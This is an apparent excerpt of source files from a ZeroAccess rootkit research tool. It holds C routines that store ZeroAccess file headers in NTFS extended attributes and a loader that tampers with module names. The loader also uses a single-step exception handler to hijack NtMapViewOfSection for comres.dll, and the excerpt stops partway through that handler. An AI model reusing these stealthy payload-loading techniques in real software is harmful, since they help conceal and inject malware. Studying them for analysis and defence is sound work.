    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       CUI.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        18 Jan 2016\n*\n*  Common header file for console ui.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#include \"global.h\"\n\nVOID SfcuiPrintText(\n\t_In_ HANDLE hOutConsole,\n\t_In_ LPWSTR lpText,\n\t_In_ BOOL ConsoleOutputEnabled,\n\t_In_ BOOL UseReturn\n\t);\n"
  },
  {
    "path": "Source/shared/ea.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2006 - 2016\n*\n*  TITLE:       EA.C\n*\n*  VERSION:     1.00\n*\n*  DATE:        15 Jan 2016\n*\n*  ZeroAccess EA support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"ea.h\"\n\n//NextOffset 0, EaNameLength 3, EaName VER\nBYTE g_ZaFileEa[] = { 0x00, 0x00, 0x00, 0x00, 0x03, 0x56, 0x45, 0x52, 0x00 };\n\n/*\n* SfNtfsQueryFileHeaderFromEa\n*\n* Purpose:\n*\n* Read ZA_FILEHEADER, required for file verification, from file.\n*\n*/\nBOOL SfNtfsQueryFileHeaderFromEa(\n\t_In_ HANDLE hFile,\n\t_Inout_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tBOOL                      bResult;\n\tNTSTATUS                  status;\n\tIO_STATUS_BLOCK           IoStatusBlock;\n\tFILE_FULL_EA_INFORMATION  *EaFullInfo;\n\tFILE_GET_EA_INFORMATION   *EaGetInfo;\n\tBYTE                      Buffer[ZA_EASIZE];\n\n\tRtlSecureZeroMemory(Buffer, sizeof(Buffer));\n\tEaFullInfo = (FILE_FULL_EA_INFORMATION *)&Buffer;\n\tEaGetInfo = (FILE_GET_EA_INFORMATION *)&g_ZaFileEa;\n\n\tstatus = NtQueryEaFile(hFile, &IoStatusBlock, EaFullInfo, ZA_EASIZE,\n\t\tFALSE, EaGetInfo, sizeof(g_ZaFileEa), NULL, FALSE);\n\n\tif ((!NT_SUCCESS(status)) || (EaFullInfo->EaValueLength != sizeof(ZA_FILEHEADER))) {\n\t\tbResult = FALSE;\n\t}\n\telse {\n\t\tRtlCopyMemory(FileHeader, (LPBYTE)(EaFullInfo->EaName + EaFullInfo->EaNameLength + 1), sizeof(ZA_FILEHEADER));\n\t\tbResult = TRUE;\n\t}\n\treturn bResult;\n}\n\n/*\n* SfNtfsSetFileHeaderToEa\n*\n* Purpose:\n*\n* Write ZA_FILEHEADER, required for file verification, to file.\n*\n*/\nBOOL SfNtfsSetFileHeaderToEa(\n\t_In_ HANDLE hFile,\n\t_In_ 
ZA_FILEHEADER *FileHeader\n\t)\n{\n\tNTSTATUS                  status;\n\tFILE_FULL_EA_INFORMATION *EaFullInfo;\n\tIO_STATUS_BLOCK           IoStatusBlock;\n\tBYTE                      Buffer[ZA_EASIZE];//152\n\n\tRtlSecureZeroMemory(Buffer, sizeof(Buffer));\n\tEaFullInfo = (FILE_FULL_EA_INFORMATION*)&Buffer;\n\n\tEaFullInfo->Flags = 0;\n\t_strcpy_a(EaFullInfo->EaName, \"VER\");\n\tEaFullInfo->EaNameLength = 3;\n\tEaFullInfo->EaValueLength = sizeof(ZA_FILEHEADER);\n\tEaFullInfo->NextEntryOffset = 0;\n\n\tRtlCopyMemory((LPBYTE)(EaFullInfo->EaName + EaFullInfo->EaNameLength + 1),\n\t\tFileHeader, sizeof(ZA_FILEHEADER));\n\n\tstatus = NtSetEaFile(hFile, &IoStatusBlock, EaFullInfo, ZA_EASIZE);\n\treturn (NT_SUCCESS(status));\n}\n\n//test ea data\nunsigned char zaea[140] = {\n\t0x01, 0x00, 0x00, 0x00, 0x7A, 0x73, 0xB0, 0x43, 0x00, 0x06, 0x00, 0x00, 0x44, 0xAC, 0x09, 0xAA,\n\t0x99, 0xF3, 0x29, 0xA3, 0x21, 0xB2, 0xE7, 0x5C, 0x46, 0x43, 0xA4, 0xDE, 0x51, 0x8C, 0xE8, 0x35,\n\t0x64, 0x66, 0x70, 0x49, 0xFE, 0xF7, 0x86, 0xC4, 0xC5, 0x56, 0x6E, 0x20, 0xC0, 0x16, 0x27, 0xB5,\n\t0xFB, 0x4D, 0x17, 0x66, 0xA2, 0x86, 0x44, 0x4A, 0x36, 0x21, 0x32, 0x18, 0x5D, 0x9E, 0x6D, 0x32,\n\t0x61, 0x20, 0xA7, 0xE7, 0x6D, 0x04, 0x00, 0x9F, 0xC5, 0xBD, 0x8E, 0xFA, 0xFC, 0xB7, 0xD7, 0x14,\n\t0x81, 0x00, 0xDA, 0xDB, 0xCB, 0x36, 0x17, 0xCE, 0x84, 0x0D, 0x53, 0x46, 0x88, 0xEF, 0x1E, 0xC0,\n\t0xF8, 0xF0, 0xDF, 0xC1, 0x15, 0x12, 0x25, 0x63, 0x04, 0x40, 0x0A, 0x00, 0x7A, 0x88, 0x93, 0x99,\n\t0xC5, 0x1E, 0x52, 0x41, 0xE5, 0x18, 0xCB, 0x11, 0xA3, 0x73, 0xD0, 0xA2, 0xA3, 0x30, 0xD0, 0x47,\n\t0x2F, 0x0F, 0x18, 0xD5, 0x03, 0x30, 0xDD, 0xC2, 0xCB, 0x3D, 0x96, 0x34\n};\n\nNTSTATUS SfNtfsDumpFileEa(\n\t_In_opt_ HANDLE RootDirectory,\n\t_In_ LPWSTR FileName\n\t)\n{\n\tNTSTATUS            status;\n\tHANDLE              hFile;\n\tIO_STATUS_BLOCK     IoStatusBlock;\n\tZA_FILEHEADER       FileHeader;\n\tOBJECT_ATTRIBUTES   ObjectAttributes;\n\tUNICODE_STRING      uFileName;\n\n\tRtlSecureZeroMemory(&uFileName, 
sizeof(uFileName));\n\tRtlInitUnicodeString(&uFileName, FileName);\n\tInitializeObjectAttributes(&ObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, RootDirectory, NULL);\n\n\tstatus = NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, &IoStatusBlock,\n\t\tFILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, \n\t\tFILE_SYNCHRONOUS_IO_NONALERT);\n\n\tif (!NT_SUCCESS(status))\n\t\treturn status;\n\n\tRtlSecureZeroMemory(&FileHeader, sizeof(FileHeader));\n\tif (SfNtfsQueryFileHeaderFromEa(hFile, &FileHeader)) {\n\t\tSfuWriteBufferToFile(L\"outEa.bin\", &FileHeader, sizeof(FileHeader), FALSE, FALSE);\n\t}\n\tNtClose(hFile);\n\treturn STATUS_SUCCESS;\n}\n\nBOOL TestEa(\n\tBOOL TestSet\n\t)\n{\n\tUNICODE_STRING     usName;\n\tNTSTATUS           status;\n\tHANDLE             hFile = NULL;\n\tIO_STATUS_BLOCK    IoStatusBlock;\n\tOBJECT_ATTRIBUTES  ObjectAttributes;\n\tBOOL               bResult = FALSE, cond = FALSE;\n\tZA_BOT_PATH        zaBotPath;\n\n\tRtlSecureZeroMemory(&usName, sizeof(usName));\n\tRtlSecureZeroMemory(&zaBotPath, sizeof(zaBotPath));\n\tSfuBuildBotPath(&zaBotPath);\n\n\tdo {\n\n\t\tRtlInitUnicodeString(&usName, L\"00000001.@\");\n\t\tInitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n\t\tif (TestSet) {\n\t\t\tstatus = NtCreateFile(&hFile, FILE_GENERIC_WRITE, &ObjectAttributes, &IoStatusBlock, NULL, 0,\n\t\t\t\t0, FILE_OPEN,\n\t\t\t\tFILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\n\t\t\t//touch the handle only if the file was actually opened\n\t\t\tif (NT_SUCCESS(status)) {\n\t\t\t\tbResult = SfNtfsSetFileHeaderToEa(hFile, (ZA_FILEHEADER *)&zaea);\n\t\t\t\tNtClose(hFile);\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\t//SfNtfsDumpFileEa returns NTSTATUS (STATUS_SUCCESS is 0), convert it to BOOL explicitly\n\t\t\tbResult = NT_SUCCESS(SfNtfsDumpFileEa(NULL, L\"out.bin\"));\n\t\t}\n\n\t} while (cond);\n\n\n\treturn bResult;\n}\n"
  },
  {
    "path": "Source/shared/ea.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       EA.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        19 Jan 2016\n*\n*  ZeroAccess EA support routines header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n//parenthesized so the macro expands safely inside larger expressions\n#define ZA_EASIZE  (sizeof(FILE_FULL_EA_INFORMATION) + sizeof(ZA_FILEHEADER)) //152 bytes\n\nBOOL SfNtfsQueryFileHeaderFromEa(\n\t_In_ HANDLE hFile,\n\t_Inout_ ZA_FILEHEADER *FileHeader\n\t);\n\nBOOL SfNtfsSetFileHeaderToEa(\n\t_In_ HANDLE hFile,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t);\n"
  },
  {
    "path": "Source/shared/gdip.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       GDIP.C\n*\n*  VERSION:     1.00\n*\n*  DATE:        18 Jan 2016\n*\n*  GDI+ support.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"gdip.h\"\n\nBOOL SfInitGdiPlus(\n\tVOID\n\t)\n{\n\tHANDLE  hGdiPlus;\n\n\thGdiPlus = LoadLibraryEx(TEXT(\"gdiplus.dll\"), 0, LOAD_LIBRARY_SEARCH_SYSTEM32);\n\tif (hGdiPlus == NULL)\n\t\treturn FALSE;\n\n\tGdiplusStartup = (pfnGdiplusStartup)GetProcAddress(hGdiPlus, \"GdiplusStartup\");\n\tif (GdiplusStartup == NULL)\n\t\treturn FALSE;\n\n\tGdiplusShutdown = (pfnGdiplusShutdown)GetProcAddress(hGdiPlus, \"GdiplusShutdown\");\n\tif (GdiplusShutdown == NULL)\n\t\treturn FALSE;\n\n\tGdipCreateBitmapFromStream = (pfnGdipCreateBitmapFromStream)GetProcAddress(hGdiPlus, \"GdipCreateBitmapFromStream\");\n\tif (GdipCreateBitmapFromStream == NULL)\n\t\treturn FALSE;\n\n\tGdipDisposeImage = (pfnGdipDisposeImage)GetProcAddress(hGdiPlus, \"GdipDisposeImage\");\n\tif (GdipDisposeImage == NULL)\n\t\treturn FALSE;\n\n\tGdipGetImageWidth = (pfnGdipGetImageWidth)GetProcAddress(hGdiPlus, \"GdipGetImageWidth\");\n\tif (GdipGetImageWidth == NULL)\n\t\treturn FALSE;\n\n\tGdipGetImageHeight = (pfnGdipGetImageHeight)GetProcAddress(hGdiPlus, \"GdipGetImageHeight\");\n\tif (GdipGetImageHeight == NULL)\n\t\treturn FALSE;\n\n\tGdipBitmapLockBits = (pfnGdipBitmapLockBits)GetProcAddress(hGdiPlus, \"GdipBitmapLockBits\");\n\tif (GdipBitmapLockBits == NULL)\n\t\treturn FALSE;\n\n\tGdipBitmapUnlockBits = (pfnGdipBitmapUnlockBits)GetProcAddress(hGdiPlus, \"GdipBitmapUnlockBits\");\n\tif (GdipBitmapUnlockBits == 
NULL)\n\t\treturn FALSE;\n\n\treturn TRUE;\n}\n"
  },
  {
    "path": "Source/shared/gdip.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       GDIP.H\n*\n*  VERSION:     1.00\n*\n*  DATE:        18 Jan 2016\n*\n*  Common header file for GDI+.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef enum {\n\tGdiplusOk = 0,\n\tGdiplusGenericError = 1,\n\tGdiplusInvalidParameter = 2,\n\tGdiplusOutOfMemory = 3,\n\tGdiplusObjectBusy = 4,\n\tGdiplusInsufficientBuffer = 5,\n\tGdiplusNotImplemented = 6,\n\tGdiplusWin32Error = 7,\n\tGdiplusWrongState = 8,\n\tGdiplusAborted = 9,\n\tGdiplusFileNotFound = 10,\n\tGdiplusValueOverflow = 11,\n\tGdiplusAccessDenied = 12,\n\tGdiplusUnknownImageFormat = 13,\n\tGdiplusFontFamilyNotFound = 14,\n\tGdiplusFontStyleNotFound = 15,\n\tGdiplusNotTrueTypeFont = 16,\n\tGdiplusUnsupportedGdiplusVersion = 17,\n\tGdiplusNotInitialized = 18,\n\tGdiplusPropertyNotFound = 19,\n\tGdiplusPropertyNotSupported = 20,\n\tGdiplusProfileNotFound = 21\n} GDI_STATUS;\n\ntypedef struct _GdiplusStartupInput {\n\tUINT32         GdiplusVersion;\n\tPVOID          DebugEventCallback;\n\tBOOL           SuppressBackgroundThread;\n\tBOOL           SuppressExternalCodecs;\n} GdiplusStartupInput, *PGdiplusStartupInput;\n\ntypedef struct _GdiplusStartupOutput {\n\tPVOID          NotificationHook;\n\tPVOID          NotificationUnhook;\n} GdiplusStartupOutput, *PGdiplusStartupOutput;\n\ntypedef struct _GdiPlusRect {\n\tINT X;\n\tINT Y;\n\tINT Width;\n\tINT Height;\n} GdiPlusRect, *PGdiPlusRect;\n\ntypedef struct _GdiPlusBitmapData {\n\tUINT Width;\n\tUINT Height;\n\tINT Stride;\n\tUINT PixelFormat;\n\tVOID* Scan0;\n\tUINT_PTR Reserved;\n} GdiPlusBitmapData, 
*PGdiPlusBitmapData;\n\ntypedef GDI_STATUS(WINAPI *pfnGdiplusStartup)(\n\t_Out_ ULONG_PTR *token,\n\t_In_  const GdiplusStartupInput *input,\n\t_Out_ GdiplusStartupOutput *output\n\t);\n\ntypedef void (WINAPI *pfnGdiplusShutdown)(\n\t_In_  ULONG_PTR token\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipCreateBitmapFromStream)(\n\tIStream* stream,\n\tvoid **bitmap\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipGetImageWidth)(\n\tvoid *image,\n\tUINT *width\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipGetImageHeight)(\n\tvoid *image,\n\tUINT *height\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipDisposeImage)(\n\tvoid *image\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipBitmapLockBits)(\n\tvoid* bitmap,\n\tCONST GdiPlusRect* rect,\n\tUINT flags,\n\tINT format,\n\tvoid* lockedBitmapData\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipBitmapUnlockBits)(\n\tvoid* bitmap,\n\tvoid* lockedBitmapData\n\t);\n\ntypedef enum\n{\n\tImageLockModeRead = 0x0001,\n\tImageLockModeWrite = 0x0002,\n\tImageLockModeUserInputBuf = 0x0004\n} ImageLockMode;\n\n#define    PixelFormatIndexed      0x00010000 // Indexes into a palette\n#define    PixelFormatGDI          0x00020000 // Is a GDI-supported format\n#define    PixelFormatAlpha        0x00040000 // Has an alpha component\n#define    PixelFormatPAlpha       0x00080000 // Pre-multiplied alpha\n#define    PixelFormatExtended     0x00100000 // Extended color 16 bits/channel\n#define    PixelFormatCanonical    0x00200000 \n#define    PixelFormatUndefined       0\n#define    PixelFormatDontCare        0\n#define    PixelFormat1bppIndexed     (1 | ( 1 << 8) | PixelFormatIndexed | PixelFormatGDI)\n#define    PixelFormat4bppIndexed     (2 | ( 4 << 8) | PixelFormatIndexed | PixelFormatGDI)\n#define    PixelFormat8bppIndexed     (3 | ( 8 << 8) | PixelFormatIndexed | PixelFormatGDI)\n#define    PixelFormat16bppGrayScale  (4 | (16 << 8) | PixelFormatExtended)\n#define    PixelFormat16bppRGB555     (5 | (16 << 8) | PixelFormatGDI)\n#define    PixelFormat16bppRGB565     
(6 | (16 << 8) | PixelFormatGDI)\n#define    PixelFormat16bppARGB1555   (7 | (16 << 8) | PixelFormatAlpha | PixelFormatGDI)\n#define    PixelFormat24bppRGB        (8 | (24 << 8) | PixelFormatGDI)\n#define    PixelFormat32bppRGB        (9 | (32 << 8) | PixelFormatGDI)\n#define    PixelFormat32bppARGB       (10 | (32 << 8) | PixelFormatAlpha | PixelFormatGDI | PixelFormatCanonical)\n#define    PixelFormat32bppPARGB      (11 | (32 << 8) | PixelFormatAlpha | PixelFormatPAlpha | PixelFormatGDI)\n#define    PixelFormat48bppRGB        (12 | (48 << 8) | PixelFormatExtended)\n#define    PixelFormat64bppARGB       (13 | (64 << 8) | PixelFormatAlpha  | PixelFormatCanonical | PixelFormatExtended)\n#define    PixelFormat64bppPARGB      (14 | (64 << 8) | PixelFormatAlpha  | PixelFormatPAlpha | PixelFormatExtended)\n#define    PixelFormat32bppCMYK       (15 | (32 << 8))\n#define    PixelFormatMax             16\n\npfnGdiplusStartup GdiplusStartup;\npfnGdiplusShutdown GdiplusShutdown;\npfnGdipCreateBitmapFromStream GdipCreateBitmapFromStream;\npfnGdipDisposeImage GdipDisposeImage;\npfnGdipGetImageWidth GdipGetImageWidth;\npfnGdipGetImageHeight GdipGetImageHeight;\npfnGdipBitmapLockBits GdipBitmapLockBits;\npfnGdipBitmapUnlockBits GdipBitmapUnlockBits;\n\nBOOL SfInitGdiPlus(\n\tVOID\n\t);\n"
  },
  {
    "path": "Source/shared/global.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       GLOBAL.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        19 Jan 2016\n*\n*  Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6102) // Using %s from failed function call at line %u\n#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#if (_MSC_VER >= 1900) \n#ifdef _DEBUG\n#pragma comment(lib, \"vcruntimed.lib\")\n#pragma comment(lib, \"ucrtd.lib\")\n#else\n#pragma comment(lib, \"libvcruntime.lib\")\n#endif\n#endif\n\n#include <winsock2.h>\n#include <Ws2tcpip.h>\n#include <Windows.h>\n#include <ntstatus.h>\n#include <process.h>\n#include <intrin.h>\n\n#include \"..\\minirtl\\minirtl.h\"\n#include \"..\\minirtl\\rtltypes.h\"\n#include \"..\\minirtl\\_filename.h\"\n#include \"..\\minirtl\\cmdline.h\"\n\n#include \"ntos.h\"\n#include \"za.h\"\n#include \"util.h\"\n#include \"md5.h\"\n#include \"za_crypto.h\"\n#include \"ldr.h\"\n#include \"rc4.h\"\n"
  },
  {
    "path": "Source/shared/ldr.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       LDR.C\n*\n*  VERSION:     1.00\n*\n*  DATE:        15 Jan 2016\n*\n*  ZeroAccess loader routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nTEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, \"_\" };\nPVOID g_pNtMapViewOfSection = NULL;\n\ntypedef struct _ZA_THREAD_CTX {\n\tTEB_ACTIVE_FRAME Frame;\n\tIMAGE_NT_HEADERS *fHeader;\n\tULONG_PTR ReturnAddress; \n\tULONG_PTR PayloadImageBase;\n\tULONG_PTR ViewBase;\n} ZA_THREAD_CTX, *PZA_THREAD_CTX;\n\n/*\n* SfLdrQueryResourceDataEx\n*\n* Purpose:\n*\n* Manually parse resource directory and load resource by given id.\n*\n*/\nPBYTE SfLdrQueryResourceDataEx(\n\t_In_ PVOID ImageBase,\n\t_In_ CONST LDR_RESOURCE_INFO* ResourceIdPath,\n\t_Out_ ULONG *DataSize\n\t)\n{\n\tBOOL                             cond = FALSE, bFound = FALSE;\n\tIMAGE_RESOURCE_DIRECTORY        *ResRoot, *ResDir;\n\tIMAGE_RESOURCE_DIRECTORY_ENTRY  *ResourceEntry = NULL;\n\tIMAGE_RESOURCE_DATA_ENTRY       *ResData;\n\tWORD                             NumberOfIdEntries;\n\tULONG                            Size;\n\tPBYTE                            Data;\n\tIMAGE_NT_HEADERS                *NtHeaders;\n\n\tif (DataSize) {\n\t\t*DataSize = 0;\n\t}\n\n\tData = NULL;\n\n\tdo {\n\n\t\tResRoot = (PIMAGE_RESOURCE_DIRECTORY)RtlImageDirectoryEntryToData(ImageBase, FALSE, IMAGE_DIRECTORY_ENTRY_RESOURCE, &Size);\n\t\tif (ResRoot == NULL)\n\t\t\tbreak;\n\n\t\tNumberOfIdEntries = ResRoot->NumberOfIdEntries;\n\t\tif (NumberOfIdEntries == 0)\n\t\t\tbreak;\n\n\t\t//position on the first entry once, before the loop, so each iteration checks the next entry\n\t\tResourceEntry = 
(PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PCHAR)ResRoot + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\tbFound = FALSE;\n\t\tdo {\n\t\t\tif (ResourceEntry->Id == ResourceIdPath->Type) {\n\t\t\t\tbFound = TRUE;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t//advance by one directory entry, not by the size of the directory header\n\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PCHAR)ResourceEntry + sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY));\n\t\t\tNumberOfIdEntries--;\n\n\t\t} while (NumberOfIdEntries != 0);\n\n\t\tif (bFound == FALSE)\n\t\t\tbreak;\n\n\t\tif ((ULONG_PTR)ResourceEntry > ((ULONG_PTR)ResRoot + Size))\n\t\t\tbreak;\n\n\t\tif (ResourceEntry->OffsetToData & 0x80000000) {\n\t\t\tResDir = (PIMAGE_RESOURCE_DIRECTORY)((PUCHAR)ResRoot + (ResourceEntry->OffsetToData & 0x7FFFFFFF));\n\t\t\tif ((ULONG_PTR)ResDir > ((ULONG_PTR)ResRoot + Size))\n\t\t\t\tbreak;\n\n\t\t\tNumberOfIdEntries = ResDir->NumberOfIdEntries;\n\t\t\tif (NumberOfIdEntries == 0)\n\t\t\t\tbreak;\n\n\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PUCHAR)ResDir + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\t\tif ((ULONG_PTR)ResourceEntry > ((ULONG_PTR)ResRoot + Size))\n\t\t\t\tbreak;\n\n\t\t\tbFound = FALSE;\n\n\t\t\tdo {\n\n\t\t\t\tif (ResourceEntry->Name == ResourceIdPath->Name) {\n\t\t\t\t\tbFound = TRUE;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\n\t\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PCHAR)ResourceEntry + sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY));\n\t\t\t\tNumberOfIdEntries--;\n\n\t\t\t} while (NumberOfIdEntries != 0);\n\n\t\t\tif (bFound == FALSE)\n\t\t\t\tbreak;\n\n\t\t\tif (ResourceEntry->OffsetToData & 0x80000000) {\n\t\t\t\tResDir = (PIMAGE_RESOURCE_DIRECTORY)((PUCHAR)ResRoot + (ResourceEntry->OffsetToData & 0x7FFFFFFF));\n\t\t\t\tif (ResDir->NumberOfIdEntries == 0)\n\t\t\t\t\tbreak;\n\t\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PUCHAR)ResDir + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\t\t}\n\n\t\t\tif ((ULONG_PTR)ResourceEntry > ((ULONG_PTR)ResRoot + Size))\n\t\t\t\tbreak;\n\n\t\t\tif (ResourceEntry) {\n\t\t\t\tResData = (PIMAGE_RESOURCE_DATA_ENTRY)((PUCHAR)ResRoot + 
ResourceEntry->OffsetToData);\n\n\t\t\t\tNtHeaders = RtlImageNtHeader(ImageBase);\n\t\t\t\tData = RtlAddressInSectionTable(NtHeaders, ImageBase, ResData->OffsetToData);\n\t\t\t\tif (DataSize) {\n\t\t\t\t\t*DataSize = ResData->Size;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} while (cond);\n\n\treturn Data;\n}\n\n/*\n* SfLdrQueryResourceData\n*\n* Purpose:\n*\n* Load resource by given id (win32 FindResource, SizeofResource, LockResource).\n*\n*/\nPBYTE SfLdrQueryResourceData(\n\t_In_ ULONG_PTR ResourceId,\n\t_In_ PVOID DllHandle,\n\t_In_ PULONG DataSize\n\t)\n{\n\tNTSTATUS                   status;\n\tULONG_PTR                  IdPath[3];\n\tIMAGE_RESOURCE_DATA_ENTRY  *DataEntry;\n\tPBYTE                      Data = NULL;\n\tULONG                      SizeOfData = 0;\n\n\tif (DllHandle != NULL) {\n\n\t\tIdPath[0] = (ULONG_PTR)RT_RCDATA; //type\n\t\tIdPath[1] = ResourceId;           //id\n\t\tIdPath[2] = 0;                    //lang\n\n\t\tstatus = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);\n\t\tif (NT_SUCCESS(status)) {\n\t\t\tstatus = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);\n\t\t\tif (NT_SUCCESS(status)) {\n\t\t\t\tif (DataSize) {\n\t\t\t\t\t*DataSize = SizeOfData;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn Data;\n}\n\n//mechanism 8\n\n\nVOID NTAPI SfLdrEnumModules(\n\t_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n\t_In_ PVOID Context,\n\t_In_ OUT BOOLEAN *StopEnumeration\n\t)\n{\n\tPUNICODE_STRING uDllName = (PUNICODE_STRING)Context;\n\n\tif (uDllName) {\n\t\tif (RtlEqualUnicodeString(&DataTableEntry->BaseDllName, uDllName, TRUE)) {\n\t\t\tDataTableEntry->BaseDllName.Length |= 1;\n\t\t\tDataTableEntry->BaseDllName.Buffer[1]++;\n\t\t}\n\t}\n\telse {\n\n\t\tif (DataTableEntry->BaseDllName.Length & 1) {\n\t\t\tDataTableEntry->BaseDllName.Length &= ~1;\n\t\t\tDataTableEntry->BaseDllName.Buffer[1]--;\n\t\t}\n\t}\n\t*StopEnumeration = 0;\n}\n\nLONG NTAPI SfLdrVehHandler(\n\tEXCEPTION_POINTERS *ExceptionInfo\n\t)\n{\n\tLPWSTR                
DllString;\n\tPZA_THREAD_CTX        ZACtx = NULL;\n\tSIZE_T                *ViewSize;\n\n\tif (\n\t\t(ExceptionInfo->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP) ||\n\t\t(ExceptionInfo->ExceptionRecord->ExceptionAddress != g_pNtMapViewOfSection)\n\t\t)\n\t{\n\t\treturn EXCEPTION_CONTINUE_SEARCH;\n\t}\n\n\tDllString = _filename_w((LPWSTR)NtCurrentTeb()->NtTib.ArbitraryUserPointer);\n\tif (_strcmpi_w(DllString, L\"comres.dll\") == 0) {\n\n\t\tZACtx = (PZA_THREAD_CTX)RtlGetFrame();\n\t\twhile ((ZACtx != NULL) && (ZACtx->Frame.Context != &g_fctx)) {\n\t\t\tZACtx = (PZA_THREAD_CTX)ZACtx->Frame.Previous;\n\t\t}\n\n\t\tif (ZACtx) {\n\n#ifdef _WIN64\n\t\t\tZACtx->ReturnAddress = *(ULONG_PTR *)ExceptionInfo->ContextRecord->Rsp;\n\t\t\tZACtx->ViewBase = (ULONG_PTR)ExceptionInfo->ContextRecord->R8;\n\n\t\t\tViewSize = 